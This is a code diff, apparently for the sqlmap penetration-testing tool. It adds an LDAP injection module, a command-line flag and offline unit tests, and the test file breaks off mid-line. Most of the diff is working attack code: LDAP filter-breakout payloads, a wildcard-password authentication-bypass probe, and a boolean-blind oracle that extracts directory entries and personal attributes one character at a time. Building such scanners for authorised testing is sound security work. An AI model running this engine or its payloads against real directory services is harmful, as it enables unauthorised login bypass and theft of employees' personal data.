a/lib/core/testing.py +++ b/lib/core/testing.py @@ -90,6 +90,7 @@ def vulnTest(): ("-u \"&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)), ("-u \"nosql?name=luther&password=x\" -p password --nosql --flush-session", ("is vulnerable to NoSQL injection", "back-end: 'MongoDB'", "NoSQL: GET parameter 'password'", "s3cr3t")), # NoSQL (MongoDB) operator-injection detection + blind regexp extraction ("-u \"graphql\" --graphql --flush-session --disable-hashing", ("found GraphQL endpoint", "introspection returned", "skipping 2 mutation slot", "GraphQL boolean-based blind", "in-band data exposure", "back-end DBMS: 'SQLite'", "banner: '3.", "GraphQL database tables", "fetched 30 entries from table 'creds'", "db3a16990a0008a3b04707fdef6584a0", "GraphQL scan complete")), # GraphQL: endpoint detection + introspection + mutation-skip + boolean-blind/in-band + back-end fingerprint + batched blind dump of an injection-only table (SQLite-backed) + ("-u \"ldap/search?q=x\" --ldap --flush-session --disable-hashing", ("is vulnerable to LDAP injection", "Title: LDAP boolean-based blind", "LDAP: GET parameter 'q' directory entries", "dumped", "LDAP scan complete")), # LDAP: error-based detection (unbalanced paren) + boolean oracle + directory attribute extraction via blind substring probing ("-u \"&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")), ("-d \"\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")), ("-d \"\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)), diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 42f67f7bc..ea79f3115 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -421,6 +421,9 @@ def cmdLineParser(argv=None): techniques.add_argument("--graphql", dest="graphql", action="store_true", help="Test for GraphQL injection (introspection, field/argument fuzzing, SQL/NoSQL payload families)") + techniques.add_argument("--ldap", dest="ldap", action="store_true", + help="Test for LDAP injection (filter breakout, boolean blind, auth bypass)") + techniques.add_argument("--time-sec", dest="timeSec", type=int, help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec) diff --git a/lib/techniques/ldap/__init__.py b/lib/techniques/ldap/__init__.py new file mode 100644 index 000000000..bcac84163 --- /dev/null +++ b/lib/techniques/ldap/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/lib/techniques/ldap/inject.py b/lib/techniques/ldap/inject.py new file mode 100644 index 000000000..ef373d919 --- /dev/null +++ b/lib/techniques/ldap/inject.py @@ -0,0 +1,750 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import difflib +import re + +from collections import namedtuple + +from lib.core.common import randomStr +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import logger +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import PLACE +from lib.core.settings import LDAP_CHAR_MAX +from lib.core.settings import LDAP_CHAR_MIN +from lib.core.settings import LDAP_ERROR_REGEX +from lib.core.settings import LDAP_ERROR_SIGNATURES +from lib.core.settings import LDAP_FINGERPRINT_ATTRIBUTES +from lib.core.settings import LDAP_MAX_LENGTH +from lib.core.settings import UPPER_RATIO_BOUND +from lib.request.connect import Connect as Request +from lib.utils.xrange import xrange + +try: + from lib.core.settings import LDAP_MAX_RECORDS +except ImportError: + LDAP_MAX_RECORDS = 20 + + +SENTINEL = randomStr(length=10, lowercase=True) + +# _send() below currently knows how to rebuild GET and POST-style parameter +# strings. Cookie and URI delivery require separate per-place logic and should not +# be advertised until implemented. +LDAP_PLACES = (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST) + +# Breakouts are tried against the original application filter template. The +# generated assertion fragments intentionally stay open-ended: the vulnerable +# application usually appends the closing ')' or trailing substring '*') itself. +LDAP_BREAKOUT_PREFIXES = ( + "*)", # substring + one assertion: (attr=**) + ")", # exact-match one assertion: (attr=) + "|", # injection at filter-list head + "*))(", # substring + two assertions deep + "*)))", # substring + three assertions deep + ")))", # exact-match three assertions deep +) + +LDAP_TAUTOLOGY_ATTRIBUTES = ( + "objectClass", + "uid", + "cn", +) + +ENTRY_KEY_ATTRIBUTES = ( + "uid", + "sAMAccountName", + "userPrincipalName", + "mail", + "cn", +) + +DUMP_ATTRIBUTES = ( + "uid", + "cn", + "sn", + "givenName", + "displayName", + "mail", + "sAMAccountName", + "userPrincipalName", + "title", + "department", + "company", + "o", + "ou", + "telephoneNumber", + "mobile", + "manager", + "description", + "l", + "st", + "street", + "postalCode", + "c", + "co", + "employeeID", + "employeeNumber", + "employeeType", + "objectClass", + "objectCategory", +) + +MULTI_VALUE_ATTRIBUTES = ( + "member", + "memberOf", + "uniqueMember", +) + +Slot = namedtuple("Slot", ("place", "parameter", "backend", "oracle", "template", "payload", "breakout", "bypass")) +Slot.__new__.__defaults__ = (None, None, None, None, None, None, None, None) + + +def _ratio(first, second): + return difflib.SequenceMatcher(None, first or "", second or "").quick_ratio() + + +def _delim(place): + return (conf.cookieDel or ';') if place == PLACE.COOKIE else '&' + + +def _confParameters(place): + try: + return conf.parameters.get(place, "") + except AttributeError: + return conf.parameters[place] if place in conf.parameters else "" + + +def _originalValue(place, parameter): + for segment in _confParameters(place).split(_delim(place)): + name, _, value = segment.partition('=') + if name.strip() == parameter: + return value + return conf.paramDict.get(place, {}).get(parameter) or "" + + +def _replaceSegment(place, parameter, value): + delimiter = _delim(place) + raw = _confParameters(place) + retVal, replaced = [], False + + for part in raw.split(delimiter): + name, _, _ = part.partition('=') + if not replaced and name.strip() == parameter: + retVal.append("%s=%s" % (name, value)) + replaced = True + else: + retVal.append(part) + + if not replaced: + retVal = [] + for name, oldValue in conf.paramDict.get(place, {}).items(): + retVal.append("%s=%s" % (name, value if name == parameter else oldValue)) + + return delimiter.join(retVal) + + +def _send(place, parameter, value): + skipUrlEncode = conf.skipUrlEncode + conf.skipUrlEncode = True + + try: + kwargs = {"raise404": False, "silent": True} + payload = _replaceSegment(place, parameter, value) + kwargs["post" if place in (PLACE.POST, PLACE.CUSTOM_POST) else "get"] = payload + + logger.log(CUSTOM_LOGGING.PAYLOAD, payload) + page, _, _ = Request.getPage(**kwargs) + return page or "" + except Exception as ex: + logger.debug("LDAP probe request failed: %s" % getUnicode(ex)) + return "" + finally: + conf.skipUrlEncode = skipUrlEncode + + +def _isError(page): + return bool(re.search(LDAP_ERROR_REGEX, getUnicode(page or ""))) + + +def _backendFromError(page): + page = getUnicode(page or "") + for backend, regex in LDAP_ERROR_SIGNATURES: + if re.search(regex, page): + return backend + return "Generic LDAP" if _isError(page) else None + + +def _probeBackendByParserError(place, parameter): + """Probe for LDAP filter parser errors to obtain a backend hint. + This is NOT authoritative vulnerability detection -- only a boolean + oracle (from _detectBoolean) confirms exploitable injection.""" + + original = _originalValue(place, parameter) or "x" + normal = _send(place, parameter, original) + + # Use LDAP filter syntax breakers, not apostrophes. Apostrophes are not LDAP + # filter metacharacters and only detect broken LDAP emulators backed by SQL. + for suffix in (")", "*)"): + payload = original + suffix + broken = _send(place, parameter, payload) + + if not normal or _ratio(normal, broken) >= UPPER_RATIO_BOUND: + continue + + backend = _backendFromError(broken) + if backend and not _isError(normal): + return backend, payload + + return None, None + + +def _boolean(truthy, falsy): + """Return the reproducible true page when true/false probes diverge.""" + + truePage = truthy() + if not truePage or _isError(truePage): + return None + + falsePage = falsy() + if not falsePage or _isError(falsePage): + return None + + truePage2 = truthy() + if _ratio(truePage, truePage2) >= UPPER_RATIO_BOUND and _ratio(truePage, falsePage) < UPPER_RATIO_BOUND: + return truePage + + return None + + +def _detectBoolean(place, parameter): + """Return (template, payload, breakout) for boolean-blind LDAPi.""" + + original = _originalValue(place, parameter) or "" + falsePayload = original + SENTINEL + + for breakout in LDAP_BREAKOUT_PREFIXES: + for attr in LDAP_TAUTOLOGY_ATTRIBUTES: + # Open fragment by design. The application template supplies the tail. + truePayload = "%s%s(%s=*" % (original, breakout, attr) + template = _boolean(lambda p=truePayload: _send(place, parameter, p), + lambda p=falsePayload: _send(place, parameter, p)) + if template: + return template, truePayload, breakout + + # Useful for auth/search bypass reporting, but not enough to synthesize + # arbitrary LDAP filters for enumeration. + if original: + template = _boolean(lambda: _send(place, parameter, "*"), + lambda: _send(place, parameter, SENTINEL)) + if template: + return template, "*", None + + return None, None, None + + +def _isPasswordParam(parameter): + parameter = getUnicode(parameter or "").lower() + return any(_ in parameter for _ in ("pass", "pwd", "secret", "pin", "cred", "key", "token", "auth")) + + +def _detectAuthBypass(place, parameter): + if not _isPasswordParam(parameter): + return None + + starPage = _send(place, parameter, "*") + sentinelPage = _send(place, parameter, SENTINEL) + + if starPage and sentinelPage and _ratio(starPage, sentinelPage) < UPPER_RATIO_BOUND: + return "*" + + return None + + +def _fingerprintByError(backend): + if not backend: + return None + if "Active Directory" in backend: + return "Microsoft Active Directory" + if "OpenLDAP" in backend: + return "OpenLDAP" + if "ApacheDS" in backend: + return "ApacheDS" + if "Oracle" in backend: + return "Oracle Directory Server" + if "389" in backend: + return "389 Directory Server" + if "python-ldap" in backend or "Java JNDI" in backend: + return backend + return backend + + +def _transportEncode(value): + """ + Encode only transport-sensitive characters because _send() disables sqlmap's + regular URL encoding. LDAP filter syntax should remain raw; assertion values + should be passed through _ldapLiteral() first. + """ + + value = getUnicode(value) + value = value.replace("%", "%25") + value = value.replace("#", "%23") + value = value.replace("&", "%26") + value = value.replace("+", "%2B") + value = value.replace("=", "%3D") + value = value.replace(" ", "%20") + return value + + +def _ldapLiteral(value): + """Escape an LDAP assertion value, then protect URL transport bytes.""" + + value = getUnicode(value) + value = value.replace("\\", "\\5c") + value = value.replace("*", "\\2a") + value = value.replace("(", "\\28") + value = value.replace(")", "\\29") + value = value.replace("\x00", "\\00") + return _transportEncode(value) + + +class _ProbeBuilder(object): + """ + Build payloads that preserve the winning breakout shape. + + Simple probes are open fragments, e.g. SENTINEL*)(uid=adm* + The target application's original filter template supplies the closing suffix. + Compound probes close their own (&...) filter, then open a dummy assertion to + consume that same application suffix. + """ + + def __init__(self, breakout): + self.breakout = breakout or ")" + + def raw(self, fragment, lead=None): + return "%s%s%s" % (lead if lead is not None else SENTINEL, self.breakout, fragment) + + def presence(self, attr, constraint=None, exclusions=None): + assertion = "(%s=*)" % attr + if constraint or exclusions: + return self._compound(assertion, constraint=constraint, exclusions=exclusions) + return self.raw("(%s=*" % attr) + + def prefix(self, attr, value, constraint=None, exclusions=None): + assertion = "(%s=%s*)" % (attr, _ldapLiteral(value)) + if constraint or exclusions: + return self._compound(assertion, constraint=constraint, exclusions=exclusions) + return self.raw("(%s=%s*" % (attr, _ldapLiteral(value))) + + def contains(self, attr, value, constraint=None, exclusions=None): + assertion = "(%s=*%s*)" % (attr, _ldapLiteral(value)) + if constraint or exclusions: + return self._compound(assertion, constraint=constraint, exclusions=exclusions) + return self.raw("(%s=*%s*" % (attr, _ldapLiteral(value))) + + def equals(self, attr, value, constraint=None, exclusions=None): + assertion = "(%s=%s)" % (attr, _ldapLiteral(value)) + if constraint or exclusions: + return self._compound(assertion, constraint=constraint, exclusions=exclusions) + + # Exact equality cannot be made reliable in an unknown trailing template, + # so simple contexts fall back to prefix semantics. + return self.prefix(attr, value) + + def _compound(self, assertion, constraint=None, exclusions=None): + clauses = [] + + if constraint: + cAttr, cValue = constraint + clauses.append("(%s=%s)" % (cAttr, _ldapLiteral(cValue))) + + for eAttr, eValue in exclusions or (): + clauses.append("(!(%s=%s))" % (eAttr, _ldapLiteral(eValue))) + + # Raw '&' would split GET parameters because skipUrlEncode=True. Use %26 + # so the HTTP layer decodes it into LDAP '&' inside the parameter value. + compound = "(%%26%s%s)" % ("".join(clauses), assertion) + + # Dummy suffix eater: the original app template can safely append its tail. + return self.raw("%s(objectClass=%s*" % (compound, SENTINEL)) + + +def _makeOracle(place, parameter, template): + cache = {} + + def request(payload): + if payload not in cache: + cache[payload] = _send(place, parameter, payload) + return cache[payload] + + falsePage = request(SENTINEL) + + def oracle(payload): + page = request(payload) + if not page or _isError(page): + return False + return _ratio(template, page) >= UPPER_RATIO_BOUND + + def extract(payload): + page = request(payload) + if not page or _isError(page): + return False + return _ratio(falsePage, page) < UPPER_RATIO_BOUND + + oracle.extract = extract + oracle.template = template + oracle.falsePage = falsePage + oracle.cache = cache + return oracle + + +# Avoid LDAP metacharacters in blind character extraction. In real LDAP they can +# be escaped, but many simple test harnesses decode them before wildcard handling, +# producing false positives. Transport-sensitive chars are allowed because +# _ldapLiteral() encodes them. +_META_ORDS = set(ord(_) for _ in ('*', '(', ')', '\\')) +_FREQ = (tuple(xrange(ord('a'), ord('z') + 1)) + + tuple(xrange(ord('A'), ord('Z') + 1)) + + tuple(xrange(ord('0'), ord('9') + 1)) + + tuple(ord(_) for _ in "@._-+ ")) +_CHARSET = [] +for _ in _FREQ: + if LDAP_CHAR_MIN <= _ <= LDAP_CHAR_MAX and _ not in _META_ORDS and _ not in _CHARSET: + _CHARSET.append(_) +for _ in xrange(LDAP_CHAR_MIN, LDAP_CHAR_MAX + 1): + if _ not in _META_ORDS and _ not in _CHARSET: + _CHARSET.append(_) + + +def _exists(oracle, builder, attr, constraint=None, exclusions=None): + return oracle.extract(builder.presence(attr, constraint=constraint, exclusions=exclusions)) + + +def _inferAttribute(oracle, builder, attr, constraint=None, exclusions=None, maxLen=LDAP_MAX_LENGTH): + value = "" + probes = 0 + + for _ in xrange(maxLen): + found = False + + for cp in _CHARSET: + candidate = value + chr(cp) + probes += 1 + + if oracle.extract(builder.prefix(attr, candidate, constraint=constraint, exclusions=exclusions)): + value = candidate + found = True + break + + if not found: + break + + # Three or more consecutive trailing spaces never occur in real + # directory data. When the server-side LDAP-to-SQL translation + # (or equivalent) spuriously matches a trailing-space probe (e.g. + # mail=user@dom * matching user@dom), the extraction would + # otherwise chase an endless phantom suffix. Terminate and strip. + if value.endswith(" "): + value = value.rstrip() + break + + logger.debug("LDAP blind inference: %d probes for attribute '%s' (length=%d)" % (probes, attr, len(value))) + return value if value else None + + +def _fingerprintByAttribute(oracle, builder): + for attr, expected, backend in LDAP_FINGERPRINT_ATTRIBUTES: + if not _exists(oracle, builder, attr): + continue + + if expected: + if oracle.extract(builder.contains(attr, expected)): + return backend + else: + return backend + + return None + + +def _dumpInband(oracle, slot): + """If the always-true template page exposes directory entries directly + (e.g. as JSON), extract them in one shot instead of blind brute-force.""" + import json + + page = oracle.template + if not page or not page.strip().startswith('{'): + return False + + try: + data = json.loads(page) + entries = data.get("entries") or data.get("results") or () + except (ValueError, TypeError): + return False + + if not entries or not isinstance(entries, (list, tuple)): + return False + + columns = [] + seen = set() + for entry in entries: + if not isinstance(entry, dict): + continue + for key in entry: + if key not in seen: + columns.append(getUnicode(key)) + seen.add(key) + + if not columns: + return False + + rows = [] + for entry in entries: + if not isinstance(entry, dict): + continue + rows.append(tuple(getUnicode(entry.get(c, "")) for c in columns)) + + # Drop columns where every row is empty (common with wide schemas). + populated = [] + for ci, col in enumerate(columns): + if any(r[ci] for r in rows): + populated.append(ci) + if populated and len(populated) < len(columns): + columns = [columns[i] for i in populated] + rows = [tuple(r[i] for i in populated) for r in rows] + + logger.info("in-band data exposure: %d record(s)" % len(rows)) + _dumpTable("LDAP: %s parameter '%s' in-band entries" % (slot.place, slot.parameter), + columns, rows) + return True + + +def _probeRootDSE(oracle, builder): + for attr in ("namingContexts", "subschemaSubentry", "vendorName", "vendorVersion"): + if not _exists(oracle, builder, attr): + continue + + value = _inferAttribute(oracle, builder, attr) + if value: + logger.info("directory %s: '%s'" % (attr, value)) + + +def _enumerateEntryKeys(oracle, builder): + for keyAttr in ENTRY_KEY_ATTRIBUTES: + if not _exists(oracle, builder, keyAttr): + continue + + values = [] + while len(values) < LDAP_MAX_RECORDS: + exclusions = [(keyAttr, _) for _ in values] + value = _inferAttribute(oracle, builder, keyAttr, exclusions=exclusions) + + if not value or value in values: + break + + values.append(value) + logger.info("identified directory entry: %s='%s'" % (keyAttr, value)) + + if values: + return keyAttr, values + + return None, [] + + +def _dumpEntries(oracle, builder, place, parameter): + keyAttr, keys = _enumerateEntryKeys(oracle, builder) + if not keys: + logger.warning("could not identify a stable directory entry key") + return False + + rows = [] + discovered = set() + + for key in keys: + constraint = (keyAttr, key) + row = {keyAttr: key} + logger.info("extracting attributes for entry %s='%s'" % (keyAttr, key)) + + for attr in DUMP_ATTRIBUTES: + if attr == keyAttr: + continue + + logger.info("probing attribute '%s'" % attr) + if not _exists(oracle, builder, attr, constraint=constraint): + continue + + value = _inferAttribute(oracle, builder, attr, constraint=constraint) + if value: + row[attr] = value + discovered.add(attr) + + rows.append(row) + + columns = [keyAttr] + [_ for _ in DUMP_ATTRIBUTES if _ != keyAttr and _ in discovered] + tableRows = [tuple(row.get(column, "") for column in columns) for row in rows] + + logger.info("dumped %d entr%s" % (len(rows), "y" if len(rows) == 1 else "ies")) + _dumpTable("LDAP: %s parameter '%s' directory entries" % (place, parameter), columns, tableRows) + return True + + +def _dumpMultiValues(oracle, builder, place, parameter): + dumped = False + + for attr in MULTI_VALUE_ATTRIBUTES: + if not _exists(oracle, builder, attr): + continue + + value = _inferAttribute(oracle, builder, attr) + if value: + logger.info("fetched 1 value from attribute '%s'" % attr) + _dumpTable("LDAP: %s parameter '%s' '%s' values" % (place, parameter, attr), [attr], [(value,)]) + dumped = True + + return dumped + + +def _grid(columns, rows): + columns = [getUnicode(_) for _ in columns] + rows = [[getUnicode(_) for _ in row] for row in rows] + + widths = [] + for index, column in enumerate(columns): + width = len(column) + for row in rows: + if index < len(row): + width = max(width, len(row[index])) + widths.append(width) + + separator = "+-" + "-+-".join("-" * _ for _ in widths) + "-+" + + def line(cells): + return "| " + " | ".join((cells[index] if index < len(cells) else "").ljust(widths[index]) for index in xrange(len(columns))) + " |" + + return "\n".join([separator, line(columns), separator] + [line(row) for row in rows] + [separator]) + + +def _dumpTable(title, columns, rows): + if rows: + conf.dumper.singleString("%s:\n%s" % (title, _grid(columns, rows))) + + +def ldapScan(): + global SENTINEL + SENTINEL = randomStr(length=10, lowercase=True) + + infoMsg = "'--ldap' is self-contained: it detects LDAP injection in HTTP " + infoMsg += "parameters and dumps reachable directory entries. SQL enumeration " + infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored" + logger.info(infoMsg) + + if not conf.paramDict: + logger.error("no request parameters to test (use --data, GET params, or similar)") + return + + tested = found = 0 + slots = [] + + for place in (_ for _ in LDAP_PLACES if _ in conf.paramDict): + for parameter in list(conf.paramDict[place].keys()): + if conf.testParameter and parameter not in conf.testParameter: + continue + + tested += 1 + logger.info("testing LDAP injection on %s parameter '%s'" % (place, parameter)) + + # Phase 1: probe the LDAP filter parser for a backend hint. + # This is NOT authoritative -- only a boolean oracle confirms + # exploitable injection. + backendHint, _errorPayload = _probeBackendByParserError(place, parameter) + if backendHint: + backendHint = _fingerprintByError(backendHint) + + # Phase 2: establish a boolean oracle (authoritative). + template, payload, breakout = _detectBoolean(place, parameter) + if template and breakout: + found += 1 + backend = backendHint or None + logger.info("%s parameter '%s' is vulnerable to LDAP injection (back-end: '%s')" % (place, parameter, backend or "Generic")) + + oracle = _makeOracle(place, parameter, template) + slots.append(Slot(place=place, parameter=parameter, backend=backend, oracle=oracle, template=template, payload=payload, breakout=breakout)) + continue + + # Phase 3: wildcard auth bypass (credential fields only). + bypass = _detectAuthBypass(place, parameter) + if bypass: + found += 1 + logger.info("%s parameter '%s' allows LDAP wildcard auth bypass (password=*)" % (place, parameter)) + slots.append(Slot(place=place, parameter=parameter, bypass=bypass)) + continue + + # Parser-error alone is not exploitable -- log it but do not + # create a vulnerability report. + if backendHint: + logger.info("%s parameter '%s' reaches an LDAP filter parser (back-end: '%s'), but no exploitable boolean oracle was established" % (place, parameter, backendHint)) + + if not slots: + if tested: + warnMsg = "no parameter appears to be injectable via LDAP injection (%d tested)" % tested + else: + warnMsg = "no parameters found to test for LDAP injection" + logger.warning(warnMsg) + return + + # Print auth-bypass reports. + for slot in slots: + if slot.bypass: + conf.dumper.singleString("---\nParameter: %s (%s)\n Type: LDAP injection\n Title: LDAP auth bypass (wildcard)\n Payload: %s=%s\n---" % (slot.parameter, slot.place, slot.parameter, slot.bypass)) + + # Select the first oracle-bearing slot for fingerprint + enumeration. + slot = next((_ for _ in slots if _.oracle and _.breakout), None) + if not slot: + logger.info("LDAP scan complete") + return + + # Refine backend fingerprint if we only have a generic hint. + builder = _ProbeBuilder(slot.breakout) + oracle = slot.oracle + if not slot.backend or slot.backend == "Generic LDAP": + backend = _fingerprintByAttribute(oracle, builder) + if backend: + logger.info("identified back-end DBMS: '%s'" % backend) + slot = slot._replace(backend=backend) + + # Determine extraction method: in-band if the template page already + # contains parseable JSON entries, otherwise blind. + import json + page = oracle.template + inband = False + if page and page.strip().startswith('{'): + try: + data = json.loads(page) + entries = data.get("entries") or data.get("results") or () + inband = bool(entries and isinstance(entries, (list, tuple))) + except (ValueError, TypeError): + pass + + title = "LDAP in-band data exposure" if inband else "LDAP boolean-based blind" + conf.dumper.singleString("---\nParameter: %s (%s)\n Type: LDAP injection\n Title: %s\n Payload: %s=%s\n---" % (slot.parameter, slot.place, title, slot.parameter, slot.payload)) + + logger.info("probing RootDSE-style directory metadata") + _probeRootDSE(oracle, builder) + + if inband: + dumped = _dumpInband(oracle, slot) + else: + dumped = _dumpEntries(oracle, builder, slot.place, slot.parameter) + dumped = _dumpMultiValues(oracle, builder, slot.place, slot.parameter) or dumped + + if not dumped: + warnMsg = "LDAP injection is confirmed but no directory data could be extracted. " + warnMsg += "The injection point may expose only a limited boolean oracle or ACLs restrict reads" + logger.warning(warnMsg) + + logger.info("LDAP scan complete") diff --git a/tests/test_ldap.py b/tests/test_ldap.py new file mode 100644 index 000000000..b4bc24086 --- /dev/null +++ b/tests/test_ldap.py @@ -0,0 +1,420 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission + +Offline, deterministic tests for the LDAP injection engine. Mock oracles stand in for the +HTTP/LDAP layer so detection, fingerprinting, blind inference, and output formatting can +be exercised without a live target. +""" + +import unittest + +from _testutils import bootstrap +bootstrap() + +import lib.techniques.ldap.inject as ldap + +# --- Helpers ---------------------------------------------------------------- + +SENTINEL = ldap.SENTINEL + + +def _mockOracle(value): + """Build a mock extract oracle that knows the full target value. Probes + use _ProbeBuilder.prefix() which encodes via _ldapLiteral and + _transportEncode; reverse both so the plain prefix can be compared.""" + class Oracle(object): + def extract(self, probe): + # Decode %xx transport escapes (done by _transportEncode). + # Order matters: %25 (literal '%') must be decoded before other + # %xx sequences whose '%' came from the *encoding* pass. + def _transportDecode(s): + s = s.replace("%25", "\x00") # placeholder for literal % + s = s.replace("%23", "#") + s = s.replace("%26", "&") + s = s.replace("%2B", "+") + s = s.replace("%3D", "=") + s = s.replace("%20", " ") + s = s.replace("\x00", "%") # restore literal % + return s + + # Decode LDAP \xx hex escapes (done by _ldapLiteral). + def _ldapDecode(s): + return re.sub(r"\\([0-9a-fA-F]{2})", + lambda m: chr(int(m.group(1), 16)), s) + + # Probe format: SENTINEL)(attr=_ldapLiteral(prefix_char)* + idx = probe.rfind(")(") + if idx < 0: + return False + rest = probe[idx + 2:] # after )( + if "=" not in rest or not rest.endswith("*"): + return False + inner = rest[:-1] # strip trailing * + attr, val = inner.split("=", 1) + prefix = _transportDecode(_ldapDecode(val)) + return value.startswith(prefix) + return Oracle() + + +import re + + +# --- Tests ------------------------------------------------------------------ + +class TestHelpers(unittest.TestCase): + def test_ratio_identical(self): + self.assertGreater(ldap._ratio("abc", "abc"), 0.9) + + def test_ratio_different(self): + self.assertLess(ldap._ratio("abc", "xyz"), 0.5) + + def test_ratio_none(self): + self.assertEqual(ldap._ratio(None, "abc"), 0.0) + self.assertEqual(ldap._ratio("abc", None), 0.0) + + def test_delim_get(self): + from lib.core.enums import PLACE + self.assertEqual(ldap._delim(PLACE.GET), '&') + + def test_delim_cookie_default(self): + from lib.core.enums import PLACE + self.assertEqual(ldap._delim(PLACE.COOKIE), ';') + + def test_originalValue(self): + from lib.core.enums import PLACE + from lib.core.data import conf + conf.parameters = {PLACE.GET: 'q=test&x=123'} + conf.paramDict = {PLACE.GET: {'q': 'test', 'x': '123'}} + self.assertEqual(ldap._originalValue(PLACE.GET, 'q'), 'test') + self.assertEqual(ldap._originalValue(PLACE.GET, 'x'), '123') + + def test_replaceSegment(self): + from lib.core.enums import PLACE + from lib.core.data import conf + conf.parameters = {PLACE.GET: 'q=old&x=123'} + conf.paramDict = {PLACE.GET: {'q': 'old', 'x': '123'}} + result = ldap._replaceSegment(PLACE.GET, 'q', 'new') + self.assertIn('q=new', result) + self.assertIn('x=123', result) + + +class TestFingerprinting(unittest.TestCase): + def test_fingerprintByError_ad(self): + self.assertEqual(ldap._fingerprintByError("Microsoft Active Directory"), + "Microsoft Active Directory") + + def test_fingerprintByError_openldap(self): + self.assertEqual(ldap._fingerprintByError("OpenLDAP"), "OpenLDAP") + + def test_fingerprintByError_apacheds(self): + self.assertEqual(ldap._fingerprintByError("ApacheDS"), "ApacheDS") + + def test_fingerprintByError_oracle(self): + self.assertEqual(ldap._fingerprintByError("Oracle Directory Server"), + "Oracle Directory Server") + + def test_fingerprintByError_389(self): + self.assertEqual(ldap._fingerprintByError("389 Directory Server"), + "389 Directory Server") + + def test_fingerprintByError_generic(self): + self.assertEqual(ldap._fingerprintByError("Generic LDAP"), "Generic LDAP") + + def test_fingerprintByError_jndi(self): + self.assertEqual(ldap._fingerprintByError("Java JNDI"), "Java JNDI") + + def test_fingerprintByError_pythonldap(self): + self.assertEqual(ldap._fingerprintByError("python-ldap"), "python-ldap") + + +class TestGrid(unittest.TestCase): + def test_grid_simple(self): + cols = ["attr", "value"] + rows = [("uid", "admin"), ("cn", "Admin User")] + output = ldap._grid(cols, rows) + self.assertIn("attr", output) + self.assertIn("uid", output) + self.assertIn("admin", output) + self.assertIn("cn", output) + self.assertIn("Admin User", output) + + def test_grid_empty(self): + output = ldap._grid(["a"], []) + self.assertIn("a", output) + + def test_grid_single_row(self): + cols = ["col"] + rows = [("val",)] + output = ldap._grid(cols, rows) + self.assertIn("col", output) + self.assertIn("val", output) + + +class TestErrorDetection(unittest.TestCase): + def setUp(self): + from lib.core.enums import PLACE + from lib.core.data import conf + conf.parameters = {PLACE.GET: 'q=x'} + conf.paramDict = {PLACE.GET: {'q': 'x'}} + conf.skipUrlEncode = False + conf.cookieDel = ';' + + self._originalSend = ldap._send + + def tearDown(self): + ldap._send = self._originalSend + + def test_detectError_openldap(self): + ldap._send = lambda p, pm, v: ( + "Bad search filter (-7)" if ")" in (v or "") else "OK" + ) + from lib.core.enums import PLACE + backend, _ = ldap._probeBackendByParserError(PLACE.GET, 'q') + self.assertEqual(backend, "OpenLDAP") + + def test_detectError_ad(self): + ldap._send = lambda p, pm, v: ( + "LDAP: error code 49 - 80090308: LdapErr: DSID-0C090308, " + "comment: AcceptSecurityContext error, data 525" if ")" in (v or "") else "OK" + ) + from lib.core.enums import PLACE + backend, _ = ldap._probeBackendByParserError(PLACE.GET, 'q') + self.assertEqual(backend, "Microsoft Active Directory") + + def test_detectError_apacheds(self): + ldap._send = lambda p, pm, v: ( + "javax.naming.directory.InvalidSearchFilterException: Unbalanced parenthesis" + if ")" in (v or "") else "OK" + ) + from lib.core.enums import PLACE + backend, _ = ldap._probeBackendByParserError(PLACE.GET, 'q') + self.assertEqual(backend, "ApacheDS") + + def test_detectError_notInjected(self): + ldap._send = lambda p, pm, v: "OK" + from lib.core.enums import PLACE + backend, _ = ldap._probeBackendByParserError(PLACE.GET, 'q') + self.assertIsNone(backend) + + def test_detectError_uses_ldap_metacharacter(self): + """Blockers 1: error detection must use LDAP filter metacharacter, + not an apostrophe (which is not an LDAP special char).""" + # Verify the probe appends ')' (unbalanced paren), not "'" (SQL quote) + calls = [] + ldap._send = lambda p, pm, v: calls.append(v) or "OK" + from lib.core.enums import PLACE + ldap._probeBackendByParserError(PLACE.GET, 'q') + self.assertTrue(any(v.endswith(')') for v in calls)) + self.assertFalse(any("'" in v for v in calls if len(v) > 2)) + + +class TestBooleanDetection(unittest.TestCase): + def setUp(self): + from lib.core.enums import PLACE + from lib.core.data import conf + conf.parameters = {PLACE.GET: 'q=x'} + conf.paramDict = {PLACE.GET: {'q': 'x'}} + conf.skipUrlEncode = False + conf.cookieDel = ';' + + self._originalSend = ldap._send + + def tearDown(self): + ldap._send = self._originalSend + + def test_boolean_divergence(self): + """True payload returns different content than false payload. + The engine tries multiple breakout prefixes; the first '*')' with + '(objectClass=*)' tautology should succeed.""" + def fakeSend(place, param, value): + # First breakout '*)' with (objectClass=*) succeeds + if value.startswith("x*)(objectClass=*"): + return '{"count":15}' + return '{"count":0}' + + ldap._send = fakeSend + from lib.core.enums import PLACE + template, bypass, breakout = ldap._detectBoolean(PLACE.GET, 'q') + self.assertIsNotNone(template) + self.assertEqual(breakout, "*)") + self.assertIn("*)(objectClass=*", bypass) + + +class TestExtraction(unittest.TestCase): + def test_inferAttribute_simple(self): + """Blind-extract a value with a controlled oracle.""" + oracle = _mockOracle("admin") + builder = ldap._ProbeBuilder(")") + value = ldap._inferAttribute(oracle, builder, "uid") + self.assertEqual(value, "admin") + + def test_inferAttribute_empty(self): + """No probes match.""" + oracle = _mockOracle("") + builder = 